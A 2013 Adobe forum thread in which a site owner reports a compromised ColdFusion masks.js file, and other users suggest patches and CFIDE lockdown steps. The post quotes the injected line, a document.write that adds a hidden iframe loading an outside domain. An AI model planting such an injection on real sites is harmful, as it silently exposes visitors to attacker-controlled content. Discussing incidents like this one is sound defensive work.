Skip to main content
X
XeeMe2
Participant
September 3, 2013
Question

CFIDE/scripts/masks.js Compromised

  • September 3, 2013
  • 4 replies
  • 2340 views

We just found an injection at the end of masks.js

Here is the content that was added:

"document.write("<iframe width='1' height='0' src='http://top12.oufm.info/'></iframe>");"

Not sure what to make out of it. We have a very cryptic password known only to 2 people. Hacking the server would be pretty difficult so I assume somehow hacking into CFIDE was the issue. Anybody seen anything similar?

It must have happened August 31, 2013

We are using CF 9.02 with ....lib/updates/hf902-00003.jar

Thanks for any feedback and advice how to prevent another one

Rob

This topic has been closed for replies.

4 replies

T
tribule
Legend
September 3, 2013

Would making all of the /CFIDE folder have basic authentication, for example, stop such an attack?

Anit_Kumar
Anit_Kumar
Inspiring
September 4, 2013

Please refer to the Block /CFIDE requests section of the LockDown Guide (http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf).

And refer to Set up a virtual directory alias for /CFIDE/scripts for CFIDE/Scripts on the same guide.

Hope this answers your query.

Regards,

Anit Kumar

T
tribule
Legend
September 4, 2013

Anit, I've read the lockdown guide, but can you also please confirm that putting authentication on the CFIDE folder will also stop such attacks. Or, is this not a good idea? If not, why?

X
XeeMe2Author
Participant
September 3, 2013

Thanks Anit, appreciate it. Yes, we saw it but felt it is not really helping as the CFIDE will need to be accessible virtually somehow. Also it looked like a huge act for just a little improvement.

Steve, thanks a lot for your comment. Do you have a more detailed description somewhere? Not sure how to do what you suggested.

Thanks

Rob

S
Steve Sommers
Legend
September 3, 2013

There are various threads on this and similar CFIDE vulnerabilities. Make sure you are at the latest patch/hotfix level. Also for your web facing sites, I always recommend pointing your "cfide" virtual directory to an empty directory and then adding a "scripts" virtual directory under it that points back to the original cfide/scripts location. This fixes most CFIDE vulnerabilities.

Anit_Kumar
Anit_Kumar
Inspiring
September 3, 2013

Hello XeeMe2,

Thank you for your post. have you followed the LockDown guide for blocking CFIDE requests. Here is the link http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf

Regards,

Anit Kumar

Terms & ConditionsAccessibility statement
Using the community Terms of use Privacy Cookie preferences Do not sell or share my personal information ad choicesAdChoices